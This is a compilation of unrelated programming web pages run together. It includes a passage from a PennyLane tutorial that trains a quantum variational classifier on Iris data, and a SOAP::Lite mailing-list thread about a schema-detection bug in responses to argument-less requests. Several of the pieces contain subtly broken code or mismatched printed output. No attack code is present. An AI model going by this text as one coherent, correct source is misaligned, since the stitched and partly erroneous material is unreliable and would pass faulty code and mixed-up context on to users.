monitor the generalization performance, the data is split into training and validation set. np.random.seed(0) num_data = len(Y) num_train = int(0.75 * num_data) index = np.random.permutation(range(num_data)) feats_train = features[index[:num_train]] Y_train = Y[index[:num_train]] feats_val = features[index[num_train:]] Y_val = Y[index[num_train:]] # We need these later for plotting X_train = X[index[:num_train]] X_val = X[index[num_train:]] Optimization¶ First we initialize the variables. num_qubits = 2 num_layers = 6 var_init = (0.01 * np.random.randn(num_layers, num_qubits, 3), 0.0) Again we optimize the cost. This may take a little patience. opt = NesterovMomentumOptimizer(0.01) batch_size = 5 # train the variational classifier var = var_init for it in range(60): # Update the weights by one optimizer step batch_index = np.random.randint(0, num_train, (batch_size,)) feats_train_batch = feats_train[batch_index] Y_train_batch = Y_train[batch_index] var = opt.step(lambda v: cost(v, feats_train_batch, Y_train_batch), var) # Compute predictions on train and validation set predictions_train = [np.sign(variational_classifier(var, angles=f)) for f in feats_train] predictions_val = [np.sign(variational_classifier(var, angles=f)) for f in feats_val] # Compute accuracy on train and validation set acc_train = accuracy(Y_train, predictions_train) acc_val = accuracy(Y_val, predictions_val) print( "Iter: {:5d} | Cost: {:0.7f} | Acc train: {:0.7f} | Acc validation: {:0.7f} " "".format(it + 1, cost(var, features, Y), acc_train, acc_val) ) Out: Iter: 1 | Cost: 1.4490948 | Acc train: 0.4933333 | Acc validation: 0.5600000 Iter: 2 | Cost: 1.3309953 | Acc train: 0.4933333 | Acc validation: 0.5600000 Iter: 3 | Cost: 1.1582178 | Acc train: 0.4533333 | Acc validation: 0.5600000 Iter: 4 | Cost: 0.9795035 | Acc train: 0.4800000 | Acc validation: 0.5600000 Iter: 5 | Cost: 0.8857893 | Acc train: 0.6400000 | Acc validation: 0.7600000 Iter: 6 | Cost: 0.8587935 | Acc train: 0.7066667 | Acc validation: 0.7600000 Iter: 7 | Cost: 0.8496204 | Acc train: 0.7200000 | Acc validation: 0.6800000 Iter: 8 | Cost: 0.8200972 | Acc train: 0.7333333 | Acc validation: 0.6800000 Iter: 9 | Cost: 0.8027511 | Acc train: 0.7466667 | Acc validation: 0.6800000 Iter: 10 | Cost: 0.7695152 | Acc train: 0.8000000 | Acc validation: 0.7600000 Iter: 11 | Cost: 0.7437432 | Acc train: 0.8133333 | Acc validation: 0.9600000 Iter: 12 | Cost: 0.7569196 | Acc train: 0.6800000 | Acc validation: 0.7600000 Iter: 13 | Cost: 0.7887487 | Acc train: 0.6533333 | Acc validation: 0.7200000 Iter: 14 | Cost: 0.8401458 | Acc train: 0.6133333 | Acc validation: 0.6400000 Iter: 15 | Cost: 0.8651830 | Acc train: 0.5600000 | Acc validation: 0.6000000 Iter: 16 | Cost: 0.8726113 | Acc train: 0.5600000 | Acc validation: 0.6000000 Iter: 17 | Cost: 0.8389732 | Acc train: 0.6133333 | Acc validation: 0.6400000 Iter: 18 | Cost: 0.8004839 | Acc train: 0.6266667 | Acc validation: 0.6400000 Iter: 19 | Cost: 0.7592044 | Acc train: 0.6800000 | Acc validation: 0.7600000 Iter: 20 | Cost: 0.7332872 | Acc train: 0.7733333 | Acc validation: 0.8000000 Iter: 21 | Cost: 0.7184319 | Acc train: 0.8800000 | Acc validation: 0.9600000 Iter: 22 | Cost: 0.7336631 | Acc train: 0.8133333 | Acc validation: 0.7200000 Iter: 23 | Cost: 0.7503193 | Acc train: 0.6533333 | Acc validation: 0.6400000 Iter: 24 | Cost: 0.7608474 | Acc train: 0.5866667 | Acc validation: 0.5200000 Iter: 25 | Cost: 0.7443533 | Acc train: 0.6533333 | Acc validation: 0.6400000 Iter: 26 | Cost: 0.7383224 | Acc train: 0.7066667 | Acc validation: 0.6400000 Iter: 27 | Cost: 0.7322155 | Acc train: 0.7466667 | Acc validation: 0.6800000 Iter: 28 | Cost: 0.7384175 | Acc train: 0.6533333 | Acc validation: 0.6400000 Iter: 29 | Cost: 0.7393227 | Acc train: 0.6400000 | Acc validation: 0.6400000 Iter: 30 | Cost: 0.7251903 | Acc train: 0.7200000 | Acc validation: 0.6800000 Iter: 31 | Cost: 0.7125040 | Acc train: 0.7866667 | Acc validation: 0.6800000 Iter: 32 | Cost: 0.6932690 | Acc train: 0.9066667 | Acc validation: 0.9200000 Iter: 33 | Cost: 0.6800562 | Acc train: 0.9200000 | Acc validation: 1.0000000 Iter: 34 | Cost: 0.6763140 | Acc train: 0.9200000 | Acc validation: 0.9600000 Iter: 35 | Cost: 0.6790040 | Acc train: 0.8933333 | Acc validation: 0.8800000 Iter: 36 | Cost: 0.6936199 | Acc train: 0.7600000 | Acc validation: 0.7200000 Iter: 37 | Cost: 0.6767184 | Acc train: 0.8266667 | Acc validation: 0.8000000 Iter: 38 | Cost: 0.6712470 | Acc train: 0.8266667 | Acc validation: 0.8000000 Iter: 39 | Cost: 0.6747390 | Acc train: 0.7600000 | Acc validation: 0.7600000 Iter: 40 | Cost: 0.6845696 | Acc train: 0.6666667 | Acc validation: 0.6400000 Iter: 41 | Cost: 0.6703303 | Acc train: 0.7333333 | Acc validation: 0.7200000 Iter: 42 | Cost: 0.6238401 | Acc train: 0.8933333 | Acc validation: 0.8400000 Iter: 43 | Cost: 0.6028185 | Acc train: 0.9066667 | Acc validation: 0.9200000 Iter: 44 | Cost: 0.5936355 | Acc train: 0.9066667 | Acc validation: 0.9200000 Iter: 45 | Cost: 0.5722417 | Acc train: 0.9200000 | Acc validation: 0.9600000 Iter: 46 | Cost: 0.5617923 | Acc train: 0.9200000 | Acc validation: 0.9600000 Iter: 47 | Cost: 0.5413240 | Acc train: 0.9466667 | Acc validation: 1.0000000 Iter: 48 | Cost: 0.5239643 | Acc train: 0.9466667 | Acc validation: 1.0000000 Iter: 49 | Cost: 0.5100842 | Acc train: 0.9466667 | Acc validation: 1.0000000 Iter: 50 | Cost: 0.5006861 | Acc train: 0.9466667 | Acc validation: 1.0000000 Iter: 51 | Cost: 0.4821672 | Acc train: 0.9466667 | Acc validation: 1.0000000 Iter: 52 | Cost: 0.4579575 | Acc train: 0.9600000 | Acc validation: 1.0000000 Iter: 53 | Cost: 0.4397479 | Acc train: 1.0000000 | Acc validation: 1.0000000 Iter: 54 | Cost: 0.4326879 | Acc train: 0.9600000 | Acc validation: 0.9200000 Iter: 55 | Cost: 0.4351511 | Acc train: 0.9466667 | Acc validation: 0.9200000 Iter: 56 | Cost: 0.4328988 | Acc train: 0.9333333 | Acc validation: 0.9200000 Iter: 57 | Cost: 0.4149892 | Acc train: 0.9333333 | Acc validation: 0.9200000 Iter: 58 | Cost: 0.3755246 | Acc train: 0.9600000 | Acc validation: 0.9200000 Iter: 59 | Cost: 0.3468994 | Acc train: 1.0000000 | Acc validation: 1.0000000 Iter: 60 | Cost: 0.3297071 | Acc train: 1.0000000 | Acc validation: 1.0000000 We can plot the continuous output of the variational classifier for the first two dimensions of the Iris data set. plt.figure() cm = plt.cm.RdBu # make data for decision regions xx, yy = np.meshgrid(np.linspace(0.0, 1.5, 20), np.linspace(0.0, 1.5, 20)) X_grid = [np.array([x, y]) for x, y in zip(xx.flatten(), yy.flatten())] # preprocess grid points like data inputs above padding = 0.3 * np.ones((len(X_grid), 1)) X_grid = np.c_[np.c_[X_grid, padding], np.zeros((len(X_grid), 1))] # pad each input normalization = np.sqrt(np.sum(X_grid ** 2, -1)) X_grid = (X_grid.T / normalization).T # normalize each input features_grid = np.array( [get_angles(x) for x in X_grid] ) # angles for state preparation are new features predictions_grid = [variational_classifier(var, angles=f) for f in features_grid] Z = np.reshape(predictions_grid, xx.shape) # plot decision regions cnt = plt.contourf(xx, yy, Z, levels=np.arange(-1, 1.1, 0.1), cmap=cm, alpha=0.8, extend="both") plt.contour(xx, yy, Z, levels=[0.0], colors=("black",), linestyles=("--",), linewidths=(0.8,)) plt.colorbar(cnt, ticks=[-1, 0, 1]) # plot data plt.scatter( X_train[:, 0][Y_train == 1], X_train[:, 1][Y_train == 1], c="b", marker="o", edgecolors="k", label="class 1 train", ) plt.scatter( X_val[:, 0][Y_val == 1], X_val[:, 1][Y_val == 1], c="b", marker="^", edgecolors="k", label="class 1 validation", ) plt.scatter( X_train[:, 0][Y_train == -1], X_train[:, 1][Y_train == -1], c="r", marker="o", edgecolors="k", label="class -1 train", ) plt.scatter( X_val[:, 0][Y_val == -1], X_val[:, 1][Y_val == -1], c="r", marker="^", edgecolors="k", label="class -1 validation", ) plt.legend() plt.show() Total running time of the script: ( 3 minutes 29.250 seconds) Gallery generated by Sphinx-Gallery Contents Downloads
https://pennylane.ai/qml/demos/tutorial_variational_classifier.html
CC-MAIN-2020-16
refinedweb
3,432
64.78
Sometimes a strategically placed print statement can be invaluable in solving a programming problem. In the development environment (in windows), print statements just print to the console. But what do you do if your code won’t work when it’s run from the server? Below, I describe a simple app that writes those messages to a file and then displays those messages in a webpage. To start out, create a new app in your project. Adjust the permissions on the app folder so that your view can write to the folder. Next, paste the following code into the views.py file in your app. ''' Functions for reading, writing and displaying debugging messages. This program writes debugging messages to a text file. In order to do this, the program must know where to write this file and have write privelges to the folder that will contain this file. To accomplish this, put a variable in your settings.py folder called DEBUG_MESSAGES_ROOT. Set this variable to the path to the folder where you want to write the message file. This is what I have in my settings.py file: DEBUG_MESSAGES_ROOT=r'C:\Documents and Settings\CCM\Desktop\pldev\debug_messages' Note the last item is a folder name and there is no trailing separator. To write debugging messages, in the file where you want to create messages put: import debug_messages.views as dbm To post a message call the function: dbm.write(your message) To enable viewing of the files, add to your urls.py: (r'^debug_messages/$', 'yourproject.debug_messages.views.index') Finally, to view the messages, pointer your browser to /debug_messages/ You can clear the file by using the "Clear" button on this web page, or by deleting the file. ''' from django.http import HttpResponse from django.shortcuts import render_to_response from django.conf import settings import os import os.path from datetime import datetime #------------------------------------------------------------------ # Functions for managing the message file. "write" is the only function # you will need to directly access. def write(message): fname=get_filename() try: fp=file(fname,'a+') fp.write(str(datetime.now())+': '+message) fp.close() except: return HTTPHttpResponse( "Error in DEBUG_MESSAGES: could not write to file: %s\n"% fname+ "Make sure you have write privledges to this folder.") def get_filename(): return os.path.join(settings.DEBUG_MESSAGES_ROOT,'messages.txt') def clear(): fname=get_filename() if os.path.exists(fname): os.remove(fname) def read(): fname=get_filename() if not os.path.exists(fname): return ['No Messages.'] fp=file(fname,'r') the_messages=fp.readlines() fp.close() return the_messages #------------------------------------------------------------------ # The view for displaying the messages and clearing the message file. def index(request): if request.POST.get('clear','')=='clear': clear() messages=['No Messages.'] else: messages=read() return render_to_response("debug_messages.html",\ {'messages':messages, 'site_url':settings.SITE_URL}) Create a subfolder called templates. In that folder create a file called "debug_messages.html" and paste the following code into it: <html> <head> <title>Debug Messages</title> </head> <body> <h1>Debug Messages</h1> {% for x in messages %} <p>{{x}}<br><hr></p> {% endfor %} <form method="post" action="{{site_url}}/debug_messages/" > <input type="hidden" name="clear" value="clear" /> <input type="submit" value="Clear" /> </form> </body> </html> Next, add a new variable to your settings.py file. Call it DEBUG_MESSAGES_ROOT and set it equal to the path to the folder containing this app. To enable the url for viewing the messages add the following to your urls.py file in your project (not this app): (r'^debug_messages/$', 'yourproject.debug_messages.views.index') To write debugging messages from one of your python scripts, add this import statement to that script: import debug_messages.views as dbm Next, in your script add lines to print messages of the form: dbm.write(your message) To view the messages, point your browswer to the url: root/debug_messages/ Attachments (1) - debug_messages.zip (1.7 KB) - added by Chuck Martin <cwurld@…> 9 years ago. A zip file of this app Download all attachments as: .zip
https://code.djangoproject.com/wiki/SimplePrintAppForDebugging?version=1
CC-MAIN-2016-22
refinedweb
646
68.57
oop c# java - What is the difference between an interface and abstract class? The key technical differences between an abstract class and an interface are: Abstract classes can have constants, members, method stubs (methods without a body) and defined methods, whereas interfaces can only have constants and methods stubs. Methods and members of an abstract class can be defined with any visibility, whereas all methods of an interface must be defined as public(they are defined public by default). When inheriting an abstract class, a concrete child class must define the abstract methods, whereas an abstract class can extend another abstract class and abstract methods from the parent class don't have to be defined. Similarly, an interface extending another interface is not responsible for implementing methods from the parent interface. This is because interfaces cannot define any implementation. A child class can only extend a single class (abstract or concrete), whereas an interface can extend or a class can implement multiple other interfaces. A child class can define abstract methods with the same or less restrictive visibility, whereas a class implementing an interface must define the methods with the exact same visibility (public). What exactly is the difference between an interface and abstract class? An explanation can be found here: An abstract class is a class that is only partially implemented by the programmer. It may contain one or more abstract methods. An abstract method is simply a function definition that serves to tell the programmer that the method must be implemented in a child class. An interface is similar to an abstract class; indeed interfaces occupy the same namespace as classes and abstract classes. For that reason, you cannot define an interface with the same name as a class. An interface is a fully abstract class; none of its methods are implemented and instead of a class sub-classing from it, it is said to implement that interface. Anyway I find this explanation of interfaces somewhat confusing. A more common definition is: An interface defines a contract that implementing classes must fulfill. An interface definition consists of signatures of public members, without any implementing code. I don't want to highlight the differences, which have been already said in many answers ( regarding public static final modifiers for variables in interface & support for protected, private methods in abstract classes) In simple terms, I would like to say: interface: To implement a contract by multiple unrelated objects abstract class: To implement the same or different behaviour among multiple related objects From the Oracle documentation Serializableinterface. - You want to specify the behaviour of a particular data type, but not concerned about who implements its behaviour. - You want to take advantage of multiple inheritance of type. abstract class establishes "is a" relation with concrete classes. interface provides "has a" capability for classes. If you are looking for Java as programming language, here are a few more updates: Java 8 has reduced the gap between interface and abstract classes to some extent by providing a default method feature. An interface does not have an implementation for a method is no longer valid now. Refer to this documentation page for more details. Have a look at this SE question for code examples to understand better. How should I have explained the difference between an Interface and an Abstract class? When you want to provide polymorphic behaviour in an inheritance hierarchy, use abstract classes. When you want polymorphic behaviour for classes which are completely unrelated, use an interface. Let's work on this question again: The first thing to let you know is that 1/1 and 1*1 results in the same, but it does not mean that multiplication and division are same. Obviously, they hold some good relationship, but mind you both are different. I will point out main differences, and the rest have already been explained: Abstract classes are useful for modeling a class hierarchy. At first glance of any requirement, we are partially clear on what exactly is to be built, but we know what to build. And so your abstract classes are your base classes. Interfaces are useful for letting other hierarchy or classes to know that what I am capable of doing. And when you say I am capable of something, you must have that capacity. Interfaces will mark it as compulsory for a class to implement the same functionalities. The comparison of interface vs. abstract class is wrong. There should be two other comparisons instead: 1) interface vs. class and 2) abstract vs. final class. Interface vs Class Interface is a contract between two objects. E.g., I'm a Postman and you're a Package to deliver. I expect you to know your delivery address. When someone gives me a Package, it has to know its delivery address: interface Package { String address(); } Class is a group of objects that obey the contract. E.g., I'm a box from "Box" group and I obey the contract required by the Postman. At the same time I obey other contracts: class Box implements Package, Property { @Override String address() { return "5th Street, New York, NY"; } @Override Human owner() { // this method is part of another contract } } Abstract vs Final Abstract class is a group of incomplete objects. They can't be used, because they miss some parts. E.g., I'm an abstract GPS-aware box - I know how to check my position on the map: abstract class GpsBox implements Package { @Override public abstract String address(); protected Coordinates whereAmI() { // connect to GPS and return my current position } } This class, if inherited/extended by another class, can be very useful. But by itself - it is useless, since it can't have objects. Abstract classes can be building elements of final classes. Final class is a group of complete objects, which can be used, but can't be modified. They know exactly how to work and what to do. E.g., I'm a Box that always goes to the address specified during its construction: final class DirectBox implements Package { private final String to; public DirectBox(String addr) { this.to = addr; } @Override public String address() { return this.to; } } In most languages, like Java or C++, it is possible to have just a class, neither abstract nor final. Such a class can be inherited and can be instantiated. I don't think this is strictly in line with object-oriented paradigm, though. Again, comparing interfaces with abstract classes is not correct. In short the differences are the following: Syntactical Differences Between Interface and Abstract Class: - Methods and members of an abstract class can have any visibility. All methods of an interface must be public. //Does not hold true from Java 9 anymore - A concrete child class of an Abstract Class must define all the abstract methods. An Abstract child class can have abstract methods. An interface extending another interface need not provide default implementation for methods inherited from the parent interface. - A child class can only extend a single class. An interface can extend multiple interfaces. A class can implement multiple interfaces. - A child class can define abstract methods with the same or less restrictive visibility, whereas class implementing an interface must define all interface methods as public. - Abstract Classes can have constructors but not interfaces. - Interfaces from Java 9 have private static methods. In Interfaces now: public static - supported public abstract - supported public default - supported private static - supported private abstract - compile error private default - compile error private - supported Not really the answer to the original question, but once you have the answer to the difference between them, you will enter the when-to-use-each dilemma: When to use interfaces or abstract classes? When to use both? I've limited knowledge of OOP, but seeing interfaces as an equivalent of an adjective in grammar has worked for me until now (correct me if this method is bogus!). For example, interface names are like attributes or capabilities you can give to a class, and a class can have many of them: ISerializable, ICountable, IList, ICacheable, IHappy, ... Inheritance is used for two purposes: To allow an object to regard parent-type data members and method implementations as its own. To allow a reference to an objects of one type to be used by code which expects a reference to supertype object. In languages/frameworks which support generalized multiple inheritance, there is often little need to classify a type as either being an "interface" or an "abstract class". Popular languages and frameworks, however, will allow a type to regard one other type's data members or method implementations as its own even though they allow a type to be substitutable for an arbitrary number of other types. Abstract classes may have data members and method implementations, but can only be inherited by classes which don't inherit from any other classes. Interfaces put almost no restrictions on the types which implement them, but cannot include any data members or method implementations. There are times when it's useful for types to be substitutable for many different things; there are other times when it's useful for objects to regard parent-type data members and method implementations as their own. Making a distinction between interfaces and abstract classes allows each of those abilities to be used in cases where it is most relevant. The shortest way to sum it up is that an interface is: - Fully abstract, apart from defaultand staticmethods; while it has definitions (method signatures + implementations) for defaultand staticmethods, it only has declarations (method signatures) for other methods. - Subject to laxer rules than classes (a class can implement multiple interfaces, and an interfacecan inherit from multiple interfaces). All variables are implicitly constant, whether specified as public static finalor not. All members are implicitly public, whether specified as such or not. - Generally used as a guarantee that the implementing class will have the specified features and/or be compatible with any other class which implements the same interface. Meanwhile, an abstract class is: - Anywhere from fully abstract to fully implemented, with a tendency to have one or more abstractmethods. Can contain both declarations and definitions, with declarations marked as abstract. - A full-fledged class, and subject to the rules that govern other classes (can only inherit from one class), on the condition that it cannot be instantiated (because there's no guarantee that it's fully implemented). Can have non-constant member variables. Can implement member access control, restricting members as protected, private, or private package (unspecified). - Generally used either to provide as much of the implementation as can be shared by multiple subclasses, or to provide as much of the implementation as the programmer is able to supply. Or, if we want to boil it all down to a single sentence: An interface is what the implementing class has, but an abstract class is what the subclass is. By definition, interfaces cannot have an implementation for any methods, and member variables cannot be initialized. However, abstract classes can have methods implementated and member variables initialized. Use abstract classes when you expect changes in your contract, i.e., say in future you might need to add a new method. In this situation, if you decide to use an interface, when the interface is changed to include interface, your application will break when you dumped the new interface dll. To read in detail, visit difference between abstract class and a interface Differences between abstract class and interface on behalf of real implementation. Interface: It is a keyword and it is used to define the template or blue print of an object and it forces all the sub classes would follow the same prototype,as for as implementation, all the sub classes are free to implement the functionality as per it's requirement. Some of other use cases where we should use interface. Communication between two external objects(Third party integration in our application) done through Interface here Interface works as Contract., such as we want no other classes can directly instantiate an object of the class, only derived classes can use the functionality. Example of Abstract Class: public abstract class DesireCar { //It is an abstract method that defines the prototype. public abstract void Color(); // It is a default implementation of a Wheel method as all the desire cars have the same no. of wheels. // and hence no need to define this in all the sub classes in this way it saves the code duplicasy public void Wheel() { Console.WriteLine("Car has four wheel"); } } **Here is the sub classes:** public class DesireCar1 : DesireCar { public override void Color() { Console.WriteLine("This is a red color Desire car"); } } public class DesireCar2 : DesireCar { public override void Color() { Console.WriteLine("This is a red white Desire car"); } } Example Of Interface: public interface IShape { // Defines the prototype(template) void Draw(); } // All the sub classes follow the same template but implementation can be different. public class Circle : IShape { public void Draw() { Console.WriteLine("This is a Circle"); } } public class Rectangle : IShape { public void Draw() { Console.WriteLine("This is a Rectangle"); } } To give a simple but clear answer, it helps to set the context : you use both when you do not want to provide full implementations. The main difference then is an interface has no implementation at all (only methods without a body) while abstract classes can have members and methods with a body as well, i.e. can be partially implemented. I read a simple yet effective explanation of Abstract class and Interface on php.net Which is as follows..
http://code.i-harness.com/en/q/1d310a
CC-MAIN-2019-09
refinedweb
2,256
52.6
Shell Sort Algorithm- Explanation, Implementation and Complexity. Then the interval of sorting keeps on decreasing in a sequence until the interval reaches 1. These intervals are known as gap sequence. This algorithm works quite efficiently for small and medium size array as its average time complexity is near to O(n). Here are some key points of shell sort algorithm – - Shell Sort is a comparison based sorting. - Time complexity of Shell Sort depends on gap sequence . Its best case time complexity is O(n* logn) and worst case is O(n* log2n). Time complexity of Shell sort is generally assumed to be near to O(n) and less than O(n2) as determining its time complexity is still an open problem. - The best case in shell sort is when the array is already sorted. The number of comparisons is less. - It is an in-place sorting algorithm as it requires no additional scratch space. - Shell Sort is unstable sort as relative order of elements with equal values may change. - It is been observed that shell sort is 5 times faster than bubble sort and twice faster than insertion sort its closest competitor. - There are various increment sequences or gap sequences in shell sort which produce various complexity between O(n) and O(n2). Increment Sequences: - Shell’s original sequence: N/2 , N/4 , …, 1 (repeatedly divide by 2); - Hibbard’s increments: 1, 3, 7, …, 2k – 1 ; - Knuth’s increments: 1, 4, 13, …, (3k – 1) / 2 ; - Sedgewick’s increments: 1, 5, 19, 41, 109, …. Let’s understand it with an example of even size array- Observe each step in the video below carefully and try to visualize the concept of this algorithm. In this video, we observe that gap sequence is taken as |N/2|, |N/4|……1. Here is 3 Simple Steps explaining the shell sort alogrithm: - Initial interval is k (k=n/2=6), So we create virtual sublist of all values in interval of 6 i.e {61,24}, {109,119}, {149,122}, {111,125}, {34,27}, {2,145}. We apply insertion sort in all sublist and sort them. We get sorted list as {24,109,122,111,27,2,61,119,149,125,34,145}. - Then we decrease the interval ( k/2=6/2=3), we again create sublist in interval of 3 – {24,111,61,125}, {109,27,119,34}, {122,2,149,145}. After applying insertion sort to these sublists we get our list as {24,27,2,61,34,122,111,109,145,125,119,149} - We continue this process util interval decrease to 1. Next (k/2=|3/2|=1), so we just get a single list as interval size is one. On applying insertion sort on it, we get our required sorted list- {2,24,27,34,61,109,111,122,125,145,149}. Pseudocode of Merge Sort SHELL-SORT(A,n) // we take gap sequence in order of |N/2|, |N/4|, |N/8|...1 for gap=n/2; gap=0; gap/=2 do: //Perform gapped insertion sort for this gap size. for i=gap; i<n; i+=1 do: temp=A[i] // shift earlier gap-sorted elements up until // the correct location for a[i] is found for j=i; j>=gap && A[j-gap]>temp;j-=gap do: A[j]= A[j-gap] end for // put temp in its correct location A[j]= temp; end for end for end func In the above implementation of shell sort time complexity in the worst case is O(n2) as gap reduces by half in every iteration. To get better time complexity we can choose some other gap sequence as discussed above. Asymptotic Analysis of Shell Sort Since in this algorithm insertion sort is applied in the large interval of elements and then interval reduces in a sequence, therefore the running time of Shell sort is heavily dependent on the gap sequence it uses .Summarising all this – Worst Case Time complexity: O (n2) Average Case Time complexity: depends on gap sequence. Best Case Time complexity: O(n*logn) Worst Case Space Complexity: O(n) total, O(1) auxiliary Data Structure: Array Sorting In Place: Yes Stable: No Implementation of Shell Sort in various programming language C /* C implementation ShellSort */ #include<stdio.h> #include<stdlib.h> #include<math.h> /* function to sort array using shellSort */ void shellSort(int A[], int n) { int gap,i; // Start with a larger gap, then reduce the gap to 1 // we take gap sequence in order of |N/2|, |N/4|, |N/8|...1 for (gap = n/2; gap > 0; gap /= 2) { // we performe gapped insertion sort for this gap size. // The first gap elements a[0..gap-1] are already in gapped order // keep adding one more element until the entire array is gap sorted; } } } /* function to print an array */ void print_array(int A[], int size) { int i; for (i=0; i < size; i++) printf("%d ", A[i]); printf("\n"); } int main() { int A[] = {61,109,149,111,34,2,24,119,122,125,27,145}; int n = sizeof(A)/sizeof(A[0]); printf("Unsorted array: "); print_array(A, n); printf("\n"); //Call shell sort function shellSort(A, n); printf("Sorted array: "); print_array(A, n); return 0; } JAVA package com.codingeek; import java.util.Arrays; public class ShellSort { /* An utility function to print array of size n*/ /* function to sort array using shellSort */ void sort(int A[]) { int n = A.length; // Start with a larger gap, then reduce the gap to 1 // we take gap sequence in order of |N/2|, |N/4|, |N/8|...1 for (int gap = n/2; gap > 0; gap /= 2) { // we perform gapped insertion sort for this gap size. // The first gap elements a[0..gap-1] are already // in gapped order keep adding one more element // until the entire array is gap sorted for ; } } } // Driver method public static void main(String args[]) { int arr[] = {61,109,149,111,34,2,24,119,122,125,27,145}; //print unsorted array using Arrays.toString() System.out.print("Unsorted array: "); System.out.println(Arrays.toString(arr)); ShellSort ob = new ShellSort(); ob.sort(arr); System.out.print("Sorted array: "); //print sorted array System.out.println(Arrays.toString(arr)); } } Output:- Unsorted array: 61,109,149,111,34,2,24,119,122,125,27,145 Sorted array: 2,24,27,34,61,109,111,122,125,145,149 Shell Sort is one of the fastest comparison sort. It is easy to understand and easy to implement but its time complexity analysis is sophisticated. Its time complexity is still debatable topic but it lies between O(n) and O(n2). A good programmer must be aware of this sorting algorithm. Shellsort is now rarely used in serious applications. It performs more operations and has higher cache miss ratio than quicksort.(wiki) Knowledge is most useful when liberated and shared. Share this to motivate us to keep writing such online tutorials for free and do comment if anything is missing or wrong or you need any kind of help. Keep Learning… Happy Learning..
http://www.codingeek.com/algorithms/shell-sort-algorithm-explanation-implementation-and-complexity/
CC-MAIN-2017-04
refinedweb
1,173
62.07
Each pod in Kubernetes clusters has its own IP address. However, pods are frequently created and deleted. Therefore, it is not practical to directly expose pods to external access. Services decouple the frontend from the backend, which provides a loosely-coupled microservice architecture. This topic describes how to create, update, and delete Services by using the Container Service for Kubernetes (ACK) console and kubectl. Manage Services in the ACK console Create a Service - Services page, click Create in the upper-right corner of the page. - In the Create Service dialog box, set the parameters. - Click Create.On the Services page, you can view the created Service in the Service list. Update a Service - In the left-side navigation pane of the details page, choose . - On the Services page, find the Service that you want to update and click Update in the Actions column. - In the Update Service dialog box, set the parameters and click Update. - In the Service list, find the Service that you updated and click Details in the Actions column to view configuration changes. View a Service - In the left-side navigation pane of the details page, choose . - Select a cluster and a namespace, find the Service that you want to view, and then click Details in the Actions column. You can view information about the Service, such as the name, type, creation time, cluster IP address, and external endpoint. In this example, you can view the external endpoint (the IP address and port) of the Service, as shown in the following figure. To access the NGINX application, click this IP address. Manage Services by using kubectl apiVersion: v1 kind: Service metadata: annotations: service.beta.kubernetes.io/alibaba-cloud-loadbalancer-address-type: "intranet" labels: app: nignx name: my-nginx-svc namespace: default spec: ports: - port: 80 protocol: TCP targetPort: 80 selector: app: nginx type: LoadBalancer Create a Service - Create a YAML file. For more information, see the preceding YAML template.In the following example, a YAML file named my-nginx-svc.yaml is created. - Connect to the cluster by using kubectl or Cloud Shell. For more information, see Connect to Kubernetes clusters by using kubectl and Use kubectl on Cloud Shell to manage ACK clusters. - Run the following command to create a Service: kubectl apply -f my-nginx-svc.yaml - Run the following command to check whether the Service is created: kubectl get svc my-nginx-svcSample output: NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE my-nginx-svc LoadBalancer 172.21.XX.XX 192.168.XX.XX 80:31599/TCP 5m - Method 1: Run the following command to update a Service: kubectl edit service my-nginx-svc - Method 2: Manually delete a Service, modify the YAML file, and then recreate the Service. kubectl apply -f my-nginx-svc.yaml View a Service kubectl get service my-nginx-svc NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE my-nginx-svc LoadBalancer 172.21.XX.XX 192.168.XX.XX 80:31599/TCP 5m Delete a Service kubectl delete service my-nginx-svc
https://www.alibabacloud.com/help/doc-detail/86512.htm
CC-MAIN-2021-31
refinedweb
506
56.35
Re: [soaplite] XMLSchema version handling for null/nil requests Expand Messages - On Wed, 2005-05-25 at 08:52 -0700, Paul Kulchenko wrote: > Since none of the namespaces was actually "used" there is noMy hack doesn't look at the declared namespaces, it works out what > (reliable) way to tell what schema should be used in the response. We > can look at declared namespaces (as you implemented in your hack), namespace was used for the "xsi:null" / "xsi:nil" element. The problems come when using the windows SOAP API (or the mono one), which doesn't even send the xsi:null / xsi:nil element. In this situation the only way is to look at the declared namespaces. The current behaviour is definately wrong, as the schema used for responses is totally undefined (it depends on the schema used in the previous response). This, at least, breaks mono, which doesn't understand the 1999 schema, and won't parse response using the 1999 schema. Crispin > but it's not reliable (and besides, those namespaces can be declared > on any element; not necessarily on soap:envelope). > > As far as I remember you can specify a default schema to be used when > autodetection fails. It might also be possible to add a method that > you can override with your own schema detection mechanism, but I'm > not sure how feasible this is. > > Given all this I wouldn't say it's a bug ;) > > Paul. > > --- Byrne Reese <byrne@...> wrote: > > No, I would consider this a bug. Ideally, SOAP::Lite should use the > > same > > schema in the response as was sent in the request. Thanks for > > catching this. > > > > Crispin Flowerday wrote: > > > > > Hi, > > > > > > I am trying to write a SOAP::Lite server, and have run across > > what I > > > believe is a bug. It seems that when deserealizing the request > > from the > > > client, the XMLSchema version is not correctly worked out in the > > case > > > where there are no arguments to the function, e.g. imagine the > > following > > > SOAP request: > > > > > > <?xml version="1.0" encoding="UTF-8"?> > > > <soap:Envelope > > > xmlns: > > xmlns: > > xmlns: > > > > soap: > > xmlns: > > > <soap:Body> > > > <namesp1:hello xmlns: > > > </soap:Body> > > > </soap:Envelope> > > > > > > Then the response received from the server uses the 2001 schema, > > rather > > > than the 1999 schema. This causes all sorts of problems when > > mixing > > > SOAP::Lite clients, and mono clients. > > > > > > Attached is a client and a daemon that show the problem, if you > > run the > > > daemon, and then use the client to send over a 1999 schema > > request, it > > > comes back using the 2001 schema. > > > > > > I have a very hacky fix, which is probably totally the wrong way > > to fix > > > it, by inserting a block like (I know its not a real fix as you > > get > > > warnings a line slightly further down in the file): > > > > > > # $name is not used here since type should be encoded as type, > > not > > > as name > > > my ($schema, $class); > > > if( $type ) { > > > ($schema, $class) = SOAP::Utils::splitlongname($type) if > > $type; > > > } else { > > > my ( $null ) = grep /^$SOAP::Constants::NS_XSI_NILS$/, keys > > %$attrs; > > > if( $null && $null =~ /^$SOAP::Constants::NS_XSI_NILS$/ ) { > > > $schema = $1 || $2; > > > } > > > } > > > > > > in place of (in SOAP::Deserializer::decode_value) > > > > > > my ($schema, $class) = SOAP::Utils::splitlongname($type) if > > $type; > > > > > > Now, is the above described behaviour a bug? And is there a > > better fix > > > than my hack ? (I'm using 0.65_5) > > > > > > Crispin > > > > > > > > > > > > > > > ------------------------------------------------------------------------ > > > <>. > > > > > > > > > > > > > > > > > > Yahoo! Groups Links > > > > > > > > > > > > > > > Your message has been successfully 